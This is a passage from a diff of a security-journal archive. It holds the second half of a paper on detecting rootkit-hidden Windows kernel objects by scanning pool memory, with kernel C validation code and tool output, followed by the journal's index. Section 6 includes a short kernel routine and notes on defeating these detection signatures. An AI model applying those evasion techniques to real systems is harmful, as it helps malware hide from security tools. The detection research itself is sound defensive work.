|
||||
enumerating the NonPagedPool. As documented, MmProbeAndLockPages can be
|
||||
called at DISPATCH_LEVEL with the limitation of it only being allowed to
|
||||
lock resident memory pages and failing otherwise, which is a desirable
|
||||
side-effect in this case.
|
||||
|
||||
|
||||
4) Detecting Executive Objects
|
||||
|
||||
In general, all of the executive components of the NT kernel rely on the
|
||||
object manager in order to manage the objects they allocate. All objects
|
||||
allocated by the object manager have a common header named OBJECT_HEADER
|
||||
and additional optional headers such as OBJECT_HEADER_NAME_INFO, process
|
||||
quota information, and handle trace information. Let's take a look to
|
||||
see what is common to all executive objects and how we can use the pool
|
||||
block header information to identify an allocated executive object.
|
||||
Lastly, some object specific information will be discussed in terms of
|
||||
generating a useful memory signature for an object.
|
||||
|
||||
4.1) Generic Object Information
|
||||
|
||||
Since the OBJECT_HEADER is common to all objects, let's look at it in
|
||||
detail. A static field here refers to all objects of specific type, not
|
||||
all executive objects in the system.
|
||||
|
||||
kd> dt _OBJECT_HEADER
|
||||
+0x000 PointerCount : Int4B
|
||||
+0x004 HandleCount : Int4B
|
||||
+0x004 NextToFree : Ptr32 Void
|
||||
+0x008 Type : Ptr32 _OBJECT_TYPE
|
||||
+0x00c NameInfoOffset : UChar
|
||||
+0x00d HandleInfoOffset : UChar
|
||||
+0x00e QuotaInfoOffset : UChar
|
||||
+0x00f Flags : UChar
|
||||
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
|
||||
+0x010 QuotaBlockCharged : Ptr32 Void
|
||||
+0x014 SecurityDescriptor : Ptr32 Void
|
||||
+0x018 Body : _QUAD
|
||||
|
||||
-------------------+------------+-------------------------------------
|
||||
PointerCount | Variable | of references
|
||||
HandleCount | Variable | of open handles
|
||||
NextToFree | NotValid | Used when freed
|
||||
Type | Static | Pointer to OBJECTTYPE
|
||||
NameInfoOffset | Static | 0 or offset to related header
|
||||
HandleInfoOffset | Static | 0 or offset to related header
|
||||
QuotaInfoOffset | Static | 0 or offset to related header
|
||||
Flags | NotCertain | Not certain
|
||||
ObjectCreateInfo | Variable | Pointer to OBJECTCREATEINFORMATION
|
||||
QuotaBlockCharged | NotCertain | Not certain
|
||||
SecurityDescriptor | Variable | Pointer to SECURITYDESCRIPTOR
|
||||
Body | NotValid | Union with the actual object
|
||||
-------------------+------------+-------------------------------------
|
||||
|
||||
From this it is assumed that the most reliable and unique signature is
|
||||
the Type field of the OBJECT_HEADER which could be used in order to
|
||||
identify objects of a specific type such as EPROCESS, ETHREAD,
|
||||
DRIVER_OBJECT, and DEVICE_OBJECT objects.
|
||||
|
||||
|
||||
4.2) Validating Pool Block Information
|
||||
|
||||
Kernel pool management appears to be slightly different from usermode
|
||||
heap management. However, if one assumes that the only concern is
|
||||
dealing with pool memory allocations which are less then PAGE_SIZE, it is
|
||||
fairly similar. Each call to ExAllocatePoolWithTag() returns a
|
||||
pre-buffer header as follows:
|
||||
|
||||
kd> dt _POOL_HEADER
|
||||
+0x000 PreviousSize : Pos 0, 9 Bits
|
||||
+0x000 PoolIndex : Pos 9, 7 Bits
|
||||
+0x002 BlockSize : Pos 0, 9 Bits
|
||||
+0x002 PoolType : Pos 9, 7 Bits
|
||||
+0x000 Ulong1 : Uint4B
|
||||
+0x004 ProcessBilled : Ptr32 _EPROCESS
|
||||
+0x004 PoolTag : Uint4B
|
||||
+0x004 AllocatorBackTraceIndex : Uint2B
|
||||
+0x006 PoolTagHash : Uint2B
|
||||
|
||||
For the purposes of locating objects, the following is a breakdown of
|
||||
what could be useful. Again, static refers to fields common between similar
|
||||
executive objects and not all allocated POOL_HEADER structures.
|
||||
|
||||
|
||||
------------------------+------------+----------------------------------
|
||||
PreviousSize | Variable | Offset to previous pool block
|
||||
PoolIndex | NotCertain | Not certain
|
||||
BlockSize | Static | Size of pool block
|
||||
PoolType | Static | POOL_TYPE
|
||||
Ulong1 | Union | Padding, not valid
|
||||
ProcessBilled | Variable | Allocator EPROCESS when no Tag specified
|
||||
PoolTag | Static | Pool Tag (ULONG)
|
||||
AllocatorBackTraceIndex | NotCertain | Not certain
|
||||
PoolTagHash | NotCertain | Not certain
|
||||
------------------------+------------+----------------------------------
|
||||
|
||||
The POOL_HEADER contains several fields that appear to be common to similar
|
||||
objects which could be used to further verify the likelihood of
|
||||
locating an object of a specific type such as BlockSize, PoolType, and
|
||||
PoolTag.
|
||||
|
||||
In addition to the mentioned static fields, two other fields,
|
||||
PreviousSize and BlockSize, can be used to validate that the currently
|
||||
assumed POOL_HEADER appears to be a valid, allocated pool block and is in
|
||||
one of the pool managers maintained link lists. PreviousSize and
|
||||
BlockSize are multiples of the minimum pool alignment which is 8 bytes
|
||||
on a 32bit system and 16 bytes on a 64bit system. These two elements supply byte offsets to the
|
||||
neighboring pool blocks.
|
||||
|
||||
If PreviousSize equals 0, the current POOL_HEADER should be the first
|
||||
pool block in the pool's contiguous allocations. If it is not, it
|
||||
should be the same as the previous POOL_HEADERs BlockSize. The
|
||||
BlockSize should never equal 0 and should always be the same as the
|
||||
proceeding POOL_HEADERs PreviousSize.
|
||||
|
||||
The following code validates a POOL_HEADER of an allocated pool block.
|
||||
|
||||
//
|
||||
// Assumes BlockOffset < PAGE_SIZE
|
||||
// ASSERTS Flink == Flink->Blink && Blink == Blink->Flink
|
||||
//
|
||||
BOOLEAN ValidatePoolBlock (
|
||||
IN PPOOL_HEADER pPoolHdr,
|
||||
IN VALIDATE_ADDR pValidator
|
||||
) {
|
||||
BOOLEAN bReturn = FALSE;
|
||||
|
||||
PPOOL_HEADER pPrev;
|
||||
PPOOL_HEADER pNext;
|
||||
|
||||
pPrev = (PPOOL_HEADER)((PUCHAR)pPoolHdr
|
||||
- (pPoolHdr->PreviousSize * sizeof(POOL_HEADER)));
|
||||
pNext = (PPOOL_HEADER)((PUCHAR)pPoolHdr
|
||||
+ (pPoolHdr->BlockSize * sizeof(POOL_HEADER)));
|
||||
|
||||
if
|
||||
((
|
||||
( pPoolHdr == pNext )
|
||||
||( pValidator( pNext + sizeof(POOL_HEADER) - 1 )
|
||||
&& pPoolHdr->BlockSize == pNext->PreviousSize )
|
||||
)
|
||||
&&
|
||||
(
|
||||
( pPoolHdr != pPrev )
|
||||
||( pValidator( pPrev )
|
||||
&& pPoolHdr->PreviousSize == pPrev->BlockSize )
|
||||
))
|
||||
{
|
||||
bReturn = TRUE;
|
||||
}
|
||||
|
||||
return bReturn;
|
||||
}
|
||||
|
||||
|
||||
4.3) Object Specific Signatures
|
||||
|
||||
So far a few useful signatures have been shown which apply to all
|
||||
executive objects and could be used to identify them in memory. For some
|
||||
cases these may be enough to be effective. However, in other cases, it
|
||||
may be necessary to examine information within the object's body itself
|
||||
in order to identify them. It should be noted that some objects of
|
||||
interest may be clearly defined and documented while others may not be.
|
||||
Furthermore, executive object definitions may vary between OS versions.
|
||||
The following subsections briefly outline obvious memory signatures for
|
||||
a few objects which generally are of interest when identifying
|
||||
rootkit-like behavior. A few examples of object-specific signatures
|
||||
will also be discussed, some of which have been used in previous work.
|
||||
|
||||
4.3.1) Process Objects
|
||||
|
||||
Here are just a few of the most basic EPROCESS fields which can form a
|
||||
simple signature using rather predictable constant values which hold
|
||||
true for all EPROCESS structures in the same system.
|
||||
|
||||
-----------------------------+------------------------------------------
|
||||
Pcb.Header.Type | Dispatch header type number
|
||||
Pcb.Header.Size | Size of dispatcher object
|
||||
Pcb.Affinity | CPU affinity bit mask, typically CPU in system
|
||||
Pcb.BasePriority | Typically the default of 8
|
||||
Pcb.ThreadQuantum | Workstations is typically 18
|
||||
ExitTime | 0 for running processes
|
||||
UniqueProcessId | 0 if bitwise AND with 0xFFFF0002
|
||||
SectionBaseAddress | Typically 0x00400000 for non-system executables
|
||||
InheritedFromUniqueProcessId | Same as UniqueProcessId, typically a valid running pid
|
||||
Session | Unique on a per-session basis
|
||||
ImageFileName | Printable ASCII, typically ending in '.exe'
|
||||
Peb | 0x7FF00000 if bitwise AND with 0xFFF00FFF
|
||||
SubSystemVersion | XP Service Pack 2 is 0x400
|
||||
-----------------------------+------------------------------------------
|
||||
|
||||
Note that there are several other DISPATCH_HEADERs embedded within
|
||||
locks, events, timers, etc in the structure which also have a predicable
|
||||
Header.Type and Header.Size.
|
||||
|
||||
4.3.2) Thread Objects
|
||||
|
||||
Here are just a few of the most basic ETHREAD fields which can form a
|
||||
simple signature using rather predictable constant values which hold
|
||||
true for all ETHREAD structures in the same system.
|
||||
|
||||
|
||||
------------------+------------------------------------------------------
|
||||
Tcb.Header.Type | Dispatch header type number
|
||||
Tcb.Header.Size | Size of dispatcher object
|
||||
Teb | 0x7FF00000 if bitwise AND with 0xFFF00FFF
|
||||
BasePriority | Typically the default of 8
|
||||
ServiceTable | nt!KeServiceDescriptorTable(Shadow) used by RAIDE
|
||||
Affinity | CPU affinity bit mask, typically CPU in system
|
||||
PreviousMode | 0 or 1, which is KernelMode or UserMode
|
||||
Cid.UniqueProcess | 0 if bitwise AND with 0xFFFF0002
|
||||
Cid.UniqueThread | 0 if bitwise AND with 0xFFFF0002
|
||||
------------------+------------------------------------------------------
|
||||
|
||||
Note that there are several other DISPATCH_HEADERs embedded within
|
||||
locks, events, timers, etc in the structure which also have a predicable
|
||||
Header.Type and Header.Size.
|
||||
|
||||
|
||||
4.3.3) Driver Objects
|
||||
|
||||
A tool written previously named MODGREPPER by Joanna Rutkowska of
|
||||
invisiblethings.org used a signature based approach to detect hidden
|
||||
DRIVER_OBJECTs. This signature was later 'broken' by valerino described
|
||||
in a rootkit.com article titled "Please don't greap me!". Listed here
|
||||
are a few fields which a signature could be built upon to detect
|
||||
DRIVER_OBJECTs.
|
||||
|
||||
--------------+-----------------------------------------------------------
|
||||
Type | I/O Subsystem structure type ID, should be 4
|
||||
Size | Size of the structure, should be 0x168
|
||||
DeviceObject | Pointer to a valid first created device object(can be NULL)
|
||||
DriverSection | Pointer to a nt!_LDR_DATA_TABLE_ENTRY structure
|
||||
DriverName | A UNICODE_STRING structure containing the driver name
|
||||
--------------+-----------------------------------------------------------
|
||||
|
||||
|
||||
The following fields of the DRIVER_OBJECT can be validated by assuring
|
||||
they fall within the range of a loaded driver image such that:
|
||||
|
||||
|
||||
DriverStart < FIELD < DriverStart + DriverSize.
|
||||
|
||||
|
||||
--------------------+----------------------------------------------------
|
||||
DriverInit | Address of DriverEntry() function
|
||||
DriverUnload | Address of DriverUnload() function, can be NULL
|
||||
MajorFunction[0x1c] | Dispatch handlers for IRPMJXXX, can default to ntoskrnl.exe
|
||||
--------------------+----------------------------------------------------
|
||||
|
||||
|
||||
4.3.4) Device Objects
|
||||
|
||||
For the DEVICE_OBJECT structure there are few static
|
||||
signatures which are usable. Here are the only obvious ones.
|
||||
|
||||
|
||||
-------------+----------------------------------------------------------
|
||||
Type | I/O Subsystem structure type ID, should be 3
|
||||
Size | Size of the structure, should be 0xb8
|
||||
DriverObject | Pointer to a valid driver object
|
||||
-------------+----------------------------------------------------------
|
||||
|
||||
Note that the DriverObject field must be valid in order for the device
|
||||
to function.
|
||||
|
||||
4.3.5) Miscellaneous
|
||||
|
||||
So far the memory signatures discussed have been fairly straightforward
|
||||
and for the most part are simply a binary comparison with a specific
|
||||
value. Later in this paper, a technique called N-depth pointer
|
||||
validation will be discussed as a method of developing a more effective
|
||||
signature in situations where pointer based memory signatures are
|
||||
attempted to be evaded.
|
||||
|
||||
Another way of considering an object field as a signature is to validate
|
||||
it in terms of its characteristics instead of by its value. A common
|
||||
example of this would be to validate an object field LIST_ENTRY.
|
||||
Validating a LIST_ENTRY structure can be done as follows:
|
||||
|
||||
|
||||
Entry == Entry->Flink->Blink == Entry->Blink->Flink.
|
||||
|
||||
|
||||
A pointer to any object or memory allocation can also be checked using
|
||||
the function shown previously, named ValidatePoolBlock. Even a
|
||||
UNICODE_STRING.Buffer can be validated this way provided the allocation
|
||||
is less than PAGE_SIZE.
|
||||
|
||||
|
||||
5) Found An Object, Now What?
|
||||
|
||||
The question of what to do after potentially identifying an executive
|
||||
object through a signature depends on what the underlying goal is. For
|
||||
the purpose of a the sample utility included with this paper, the goal
|
||||
may be to simply display some information about the objects as it finds
|
||||
them.
|
||||
|
||||
In the context of a rootkit detector, however, there may be many more
|
||||
steps that need to be taken. For example, consider a detector looking
|
||||
for EPROCESS blocks which have been unlinked from the process linked
|
||||
list or a driver module hidden from the system service API. In order to
|
||||
determine this, some cross-view comparisons of the raw objects detected
|
||||
and the output from an API call or a list enumeration is needed.
|
||||
Detectors must also take into consideration the race condition of an
|
||||
object being created or destroyed in between the memory enumeration and
|
||||
the acquisition of the "known to the system" data.
|
||||
|
||||
Additionally, it may be desired that some additional sanity checks be
|
||||
performed on these objects in addition to the signature. Do the object
|
||||
fields x,y,z contain valid pointers? Is field c equal to b? Does this
|
||||
object appear to be valid however has signs of tampering in order to
|
||||
hide it? Does the number of detected objects match up with a global
|
||||
count value such as the one maintained in an OBJECT_TYPE structure? The
|
||||
following sections will briefly mention some random thoughts of what to
|
||||
do with a suspected object of the four types previously mentioned in
|
||||
this paper in Chapter 4.
|
||||
|
||||
|
||||
5.1) Process Objects
|
||||
|
||||
Here is a brief list of things to check when scanning for EPROCESS
|
||||
objects.
|
||||
|
||||
1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
|
||||
2. Compare against a system call such as nt!NtQuerySystemInformation.
|
||||
3. Compare against the EPROCESS->ActiveProcessLinks list.
|
||||
4. Does the process have a valid list of threads?
|
||||
5. Can PsLookupProcessByProcessId open its
|
||||
6. UniqueProcessId?
|
||||
7. Is ImageFileName a valid string? zeroed? garbage?
|
||||
|
||||
5.2) Thread Objects
|
||||
|
||||
Here is a brief list of things to check when scanning for ETHREAD
|
||||
objects.
|
||||
|
||||
1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
|
||||
2. Compare against a system call such as nt!NtQuerySystemInformation.
|
||||
3. Does the process have a valid owning process?
|
||||
4. Can PsLookupThreadByThreadId open its
|
||||
5. Cid.UniqueThread?
|
||||
6. What does Win32StartAddress point to? Is it a valid module address?
|
||||
7. What is its ServiceTable value?
|
||||
8. If it is in a wait state, for how long?
|
||||
9. Where is its stack? What does its stack trace look like?
|
||||
|
||||
|
||||
5.3) Driver Objects
|
||||
|
||||
Here is a brief list of things to check when scanning for DRIVER_OBJECT
|
||||
objects.
|
||||
|
||||
1. Compare against services found in the service control manager database.
|
||||
2. Compare against a system call such as nt!NtQuerySystemInformation.
|
||||
3. Is the object in the global system namespace?
|
||||
4. Does the driver own any valid device objects?
|
||||
5. Does the drive base address point to a valid MZ header?
|
||||
6. Do the object's function pointer fields look correct?
|
||||
7. Does DriverSection point to a valid nt!LDRDATATABLEENTRY?
|
||||
8. Does DriverName or the
|
||||
9. LDR_DATA_TABLE_ENTRY have valid strings? zeroed? garbage?
|
||||
|
||||
|
||||
5.4) Device Objects
|
||||
|
||||
Here is a brief list of things to check when scanning for DEVICE_OBJECT
|
||||
objects.
|
||||
|
||||
1. Is the owning driver object valid?
|
||||
2. Is the device named and is it mapped into the global namespace?
|
||||
3. Does it appear to be in a valid device stack?
|
||||
4. Are its Type and Size fields correct?
|
||||
|
||||
|
||||
6) Breaking Signatures
|
||||
|
||||
Memory signatures can be an effective method of identifying allocated
|
||||
objects and can serve as a low level baseline in order to detect objects
|
||||
hidden by several different methods. Although the memory signature
|
||||
detection method may be effective, it doesn't come without its own set
|
||||
of problems. Many signatures can be evaded using several different
|
||||
techniques and non-evadable signatures for objects, if any exist, have
|
||||
yet to be explored. The following sections discuss issues and counter
|
||||
measures related to defeating memory signatures.
|
||||
|
||||
|
||||
6.1) Pointer Based Signatures
|
||||
|
||||
Using a memory signature which is a valid pointer to some common object
|
||||
or static data is a very appealing signature to use for detection due to
|
||||
its reliability, however is also an easy signature to bypass. The
|
||||
following demonstrates the most simplistic method of bypassing the
|
||||
OBJECT_HEADER->Type signature this paper uses as a generic object memory
|
||||
signature. This is possible because the OBJECT_TYPE is just an allocated
|
||||
structure of fairly stable data. Many pointer based signatures with
|
||||
similar static characteristics are open to the same attack.
|
||||
|
||||
|
||||
NTSTATUS KillObjectTypeSignature (
|
||||
IN PVOID Object
|
||||
)
|
||||
{
|
||||
NTSTATUS ntStatus = STATUS_SUCESS;
|
||||
PVOID pDummyObject;
|
||||
POBJECT_HEADER pHdr;
|
||||
|
||||
pHdr = OBJECT_TO_OBJECT_HEADER( Object );
|
||||
|
||||
pDummyObject = ExAllocatePool( sizeof(OBJECT_TYPE) );
|
||||
|
||||
RtlCopyMemory( pDummyObject, pHdr->Type, sizeof(OBJECT_TYPE) );
|
||||
|
||||
pHdr->Type = pDummyObject;
|
||||
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
|
||||
6.2) N-Depth Pointer Validation
|
||||
|
||||
As demonstrated in the previous section, pointer based signatures are
|
||||
effective. However, in some cases, they may be trivial to bypass. The
|
||||
following code demonstrates an example which does what this paper refers
|
||||
to as N-depth pointer validation in an attempt to create a more complex,
|
||||
and potentially more difficult to bypass, signature using pointers. The
|
||||
following example is also evadable using the same principal of
|
||||
relocation shown above.
|
||||
|
||||
The algorithm assumes a given address is an executive object and
|
||||
attempts validation by performing the following steps:
|
||||
|
||||
1. Calculates an assumed OBJECT_HEADER
|
||||
2. Assumes pObjectHeader->Type is an OBJECT_TYPE
|
||||
3. Calculates an assumed OBJECT_HEADER for the OBJECT_TYPE
|
||||
4. Assumes pObjectHeader->Type is nt!ObpTypeObjectType
|
||||
5. Validates pTypeObject->TypeInfo.DeleteProcedure == nt!ObpDeleteObjectType
|
||||
|
||||
|
||||
BOOLEAN ValidateNDepthPtrSignature (
|
||||
IN PVOID Address,
|
||||
IN VALIDATE_ADDR pValidate
|
||||
)
|
||||
{
|
||||
PVOID pObject;
|
||||
POBJECT_TYPE pTypeObject;
|
||||
POBJECT_HEADER pHdr;
|
||||
|
||||
pHdr = OBJECT_TO_OBJECT_HEADER( Address );
|
||||
|
||||
if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;
|
||||
|
||||
// Assume this is the OBJECT_TYPE for this assumed object
|
||||
pTypeObject = pHdr->Type;
|
||||
|
||||
// OBJECT_TYPE's have headers too
|
||||
pHdr = OBJECT_TO_OBJECT_HEADER( pTypeObject );
|
||||
|
||||
if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;
|
||||
|
||||
// OBJECT_TYPE's have an OBJECT_TYPE of nt!ObpTypeObjectType
|
||||
pTypeObject = pHdr->Type;
|
||||
|
||||
if( ! pValidate(&pTypeObject->TypeInfo.DeleteProcedure) ) return FALSE;
|
||||
|
||||
// \ObjectTypes\Type has a DeleteProcedure of nt!ObpDeleteObjectType
|
||||
if( pTypeObject->TypeInfo.DeleteProcedure
|
||||
!= nt!ObpDeleteObjectType ) return FALSE;
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
|
||||
6.3) Miscellaneous
|
||||
|
||||
An obvious method of preventing detection from memory scanning would be
|
||||
to use what is commonly referred to as the Shadow Walker memory
|
||||
subversion technique. If virtual memory is unable to be read then of
|
||||
course a memory scan will skip over this area of memory. In the context
|
||||
of pool memory, however, this may not be an easy attack since it may
|
||||
create a situation where the pool appears corrupted which could lead to
|
||||
crashes or system bugchecks. Of course, attacking a function like
|
||||
nt!MmProbeAndLockPages or IoAllocateMdl globally or specifically in the
|
||||
import address table of the detector itself would work.
|
||||
|
||||
For memory signatures based on constant or predicable values it may be
|
||||
feasible to either zero out or change these fields and not disturb
|
||||
system operation. For example take the author's enhancements to the FUTo
|
||||
rootkit where it is seen that the EPROCESS->UniqueProcessId can be
|
||||
safely cleared to 0 or previously mentioned rootkit.com article titled
|
||||
"Please don't greap me!" which clears DRIVER_OBJECT->DriverName and its
|
||||
associated buffer in order to defeat MODGREPPER.
|
||||
|
||||
For the case of some pointer signatures a simple binary comparison may
|
||||
not be enough to validate it. Take the above example and using
|
||||
nt!ObpDeleteObjectType. This could be defeated by overwriting
|
||||
pTypeObject->TypeInfo.DeleteProcedure to point to a simple jump
|
||||
trampoline which is allocated elsewhere which simple jumps back to
|
||||
nt!ObpDeleteObjectType.
|
||||
|
||||
|
||||
7) GrepExec: The Tool
|
||||
|
||||
Included with this paper is a proof-of-concept tool complete with source
|
||||
which demonstrates scanning the pool for signatures to detect executable
|
||||
objects. Objects detected are DRIVER_OBJECT, DEVICE_OBJECT, EPROCESS,
|
||||
and ETHREAD. The tool does nothing to determine if an object has been
|
||||
attempted to be hidden in any way. Instead, it simply displays found
|
||||
objects to standard output. At this time the author has no plans to
|
||||
continue work with this specific tool, however, there are plans to
|
||||
integrate the memory scanning technique into another project. The source
|
||||
code for the tool can be easily modified to detect other signatures
|
||||
and/or other objects.
|
||||
|
||||
7.1) The Signature
|
||||
|
||||
For demonstration purposes the signature used is simple. All objects are
|
||||
allocated in NonPagedPool so only non-paged memory is enumerated for the
|
||||
search. The signature is detected as follows:
|
||||
|
||||
1. Enumeration is performed by assuming the start of a pool block.
|
||||
2. The signature offset is added to this pointer.
|
||||
3. The assumed signature is compared with the OBJECT_HEADER->Type
|
||||
for the object type being searched for.
|
||||
4. The assumed POOL_HEADER->PoolType is compared to the objects known
|
||||
pool type.
|
||||
5. The assumed POOL_HEADER is validated using the function
|
||||
from section , ValidatePoolBlock.
|
||||
|
||||
|
||||
The following is the function which sets up the parameters in order to
|
||||
perform the pool enumeration and validation of a block by a single PVOID
|
||||
signature. On a match, a callback is made using the pointer to the start
|
||||
of the matching block. As an alternative to the PVOID signature, the
|
||||
poolgrep.c code can easily be modified to accept either a structure to
|
||||
several signatures and offsets or a validation function pointer in order
|
||||
to perform a more complex signature validation.
|
||||
|
||||
|
||||
NTSTATUS ScanPoolForExecutiveObjectByType (
|
||||
IN PVOID Object,
|
||||
IN FOUND_BLOCK_CB Callback,
|
||||
IN PVOID CallbackContext
|
||||
) {
|
||||
NTSTATUS ntStatus = STATUS_SUCCESS;
|
||||
POBJECT_HEADER pObjHdr;
|
||||
PPOOL_HEADER pPoolHdr;
|
||||
ULONG_PTR blockSigOffset;
|
||||
ULONG_PTR blockSignature;
|
||||
|
||||
pObjHdr = OBJECT_TO_OBJECT_HEADER( Object );
|
||||
pPoolHdr = OBJHDR_TO_POOL_HEADER( pObjHdr );
|
||||
blockSigOffset = (ULONG_PTR)&pObjHdr->Type - (ULONG_PTR)pObjHdr
|
||||
+ OBJHDR_TO_POOL_BLOCK_OFFSET(pObjHdr);
|
||||
blockSignature = (ULONG_PTR)pObjHdr->Type;
|
||||
|
||||
(VOID)ScanPoolForBlockBySignature( pPoolHdr->PoolType - 1,
|
||||
0, // pPoolHdr->PoolTag OPTIONAL,
|
||||
blockSigOffset,
|
||||
blockSignature,
|
||||
Callback,
|
||||
CallbackContext );
|
||||
return ntStatus;
|
||||
}
|
||||
|
||||
|
||||
7.2) Usage
|
||||
|
||||
GrepExec usage is pretty straightforward. Here is the output of the
|
||||
help command.
|
||||
|
||||
**********************************************************
|
||||
GREPEXEC 0.1 * Grepping executive objects from the pool *
|
||||
Author: bugcheck
|
||||
Built on: May 30 2006
|
||||
**********************************************************
|
||||
|
||||
Usage: grepexec.exe [options]
|
||||
|
||||
--help, -h Displays this information
|
||||
--install, -i Manually install driver
|
||||
--uninstall, -u Manually uninstall driver
|
||||
--status, -s Display installation status
|
||||
--process, -p GREP process objects
|
||||
--thread, -t GREP thread objects
|
||||
--driver, -d GREP driver objects
|
||||
--device, -e GREP device objects
|
||||
|
||||
|
||||
7.3) Sample Output
|
||||
|
||||
The standard output is also straight forward. Here is a sample of each
|
||||
supported command.
|
||||
|
||||
C:\grepexec>grepexec.exe -p
|
||||
EPROCESS=81736C88 CID=0354 NAME: svchost.exe
|
||||
EPROCESS=8174E238 CID=0634 NAME: explorer.exe
|
||||
EPROCESS=81792020 CID=027c NAME: winlogon.exe
|
||||
...
|
||||
|
||||
C:\grepexec>grepexec.exe -t
|
||||
EPROCESS=817993C0 ETHREAD=815D4A58 CID=0778.077c wscntfy.exe
|
||||
EPROCESS=8174AA88 ETHREAD=815D6860 CID=0408.0678 svchost.exe
|
||||
EPROCESS=819CA830 ETHREAD=815F3B30 CID=0004.0368 System
|
||||
EPROCESS=81792020 ETHREAD=81600398 CID=027c.0460 winlogon.exe
|
||||
...
|
||||
|
||||
C:\grepexec>grepexec.exe -d
|
||||
DRIVER=81722DA0 BASE=F9B5C000 \FileSystem\NetBIOS
|
||||
DRIVER=819A4B50 BASE=F983D000 \Driver\Ftdisk
|
||||
DRIVER=81725DA0 BASE=00000000 \Driver\Win32k
|
||||
DRIVER=81771880 BASE=F9EB4000 \Driver\Beep
|
||||
...
|
||||
|
||||
C:\grepexec>grepexec.exe -e
|
||||
DEVICE=81733860 \Driver\IpNat NAME: IPNAT
|
||||
DEVICE=81738958 \Driver\Tcpip NAME: Udp
|
||||
DEVICE=817394B8 \Driver\Tcpip NAME: RawIp
|
||||
DEVICE=81637CE0 \FileSystem\Srv NAME: LanmanServer
|
||||
...
|
||||
|
||||
|
||||
8) Conclusion
|
||||
|
||||
From reading this paper the reader should have a good understanding of
|
||||
the concepts and issues related to scanning memory for signatures in
|
||||
order to detect objects in the system pool. The reader should be able
|
||||
to enumerate system memory safely, construct their own customized memory
|
||||
signatures, locate signatures in memory, and implement their own
|
||||
reporting mechanism.
|
||||
|
||||
It is obvious that object detection using memory scanning is no exact
|
||||
science. However, it does provide a method which, for the most part,
|
||||
interacts with the system as little as possible. The
|
||||
author believes that the outlined technique can be successfully
|
||||
implemented to obtain acceptable results in detecting objects hidden by
|
||||
rootkits.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Blackhat.com. RAIDE: Rootkit Analysis Identification Elimination.
|
||||
http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Silberman-Butler.pdf;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
F-Secure. Blacklight.
|
||||
http://www.f-secure.com/blacklight/;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Invisiblethings.org. MODGREPPER.
|
||||
http://www.invisiblethings.org/tools.html;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Phrack.org. Shadow Walker.
|
||||
http://www.phrack.org/phrack/63/p63-0x08_Raising_The_Bar_For_Windows_Rootkit_Detection.txt;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Rootkit.com. FU.
|
||||
http://rootkit.com/project.php?id=12;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Rootkit.com. Please don't greap me!.
|
||||
http://rootkit.com/newsread.php?newsid=316;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Uninformed.org. futo.
|
||||
http://uninformed.org/?v=3&a=7&t=sumry;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Windows Hardware Developer Central. Debugging Tools for Windows.
|
||||
http://www.microsoft.com/whdc/devtools/debugging/default.mspx;
|
||||
Accessed May. 30, 2006.
|
2070
uninformed/4.8.txt
Normal file
2070
uninformed/4.8.txt
Normal file
File diff suppressed because it is too large
Load diff
30
uninformed/4.txt
Normal file
30
uninformed/4.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
Engineering in Reverse
|
||||
Improving Automated Analysis of Windows x64 Binaries
|
||||
skape
|
||||
As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can be performed prior to doing code or data flow analysis can be useful in getting a better understanding for how a binary operates. To that point, this paper gives a brief explanation of some of the changes that have been made to support Windows x64 binaries. From there, a few basic techniques are illustrated that can be used to improve the process of identifying functions, annotating their stack frames, and describing their exception handler relationships. Source code to an example IDA plugin is also included that shows how these techniques can be implemented.
|
||||
txt | code.tgz | pdf | html
|
||||
|
||||
Exploitation Technology
|
||||
Exploiting the Otherwise Non-Exploitable on Windows
|
||||
Skywing & skape
|
||||
This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such as NULL pointer dereferences. To facilitate this, an attacker gains control of the top-level unhandled exception filter for a process in an indirect fashion. While there has been previous work illustrating the usefulness in gaining control of the top-level unhandled exception filter, Microsoft has taken steps in XPSP2 and beyond, such as function pointer encoding, to prevent attackers from being able to overwrite and control the unhandled exception filter directly. While this security enhancement is a marked improvement, it is still possible for an attacker to gain control of the top-level unhandled exception filter by taking advantage of a design flaw in the way unhandled exception filters are chained. This approach, however, is limited by an attacker's ability to control the chaining of unhandled exception filters, such as through the loading and unloading of DLLs. This does reduce the global impact of this approach; however, there are some interesting cases where it can be immediately applied, such as with Internet Explorer.
|
||||
txt | pdf | html
|
||||
|
||||
General Research
|
||||
Abusing Mach on Mac OS X
|
||||
nemo
|
||||
This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, such as securelevel. Furthermore, examples are given that show how Mach functions can be used to supplement the limited ptrace functionality included in Mac OS X.
|
||||
txt | pdf | html
|
||||
|
||||
Rootkit Technology
|
||||
GREPEXEC: Grepping Executive Objects from Pool Memory
|
||||
bugcheck
|
||||
As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to enumerate maintained lists is no longer enough to provide effective cross-view detection. To that point, scanning virtual memory for object signatures has been shown to provide useful, but limited, results. The following paper outlines the theory and practice behind scanning memory for hidden objects. This method relies upon the ability to safely reference the Windows system virtual address space and also depends upon building and locating effective memory signatures. Using this method as a base, suggestions are made as to what actions might be performed once objects are detected. The paper also provides a simple example of how object-independent signatures can be built and used to detect several different kernel objects on all versions of Windows NT+. Due to time constraints, the source code associated with this paper will be made publicly available in the near future.
|
||||
txt | pdf | html
|
||||
|
||||
What Were They Thinking?
|
||||
Anti-Virus Software Gone Wrong
|
||||
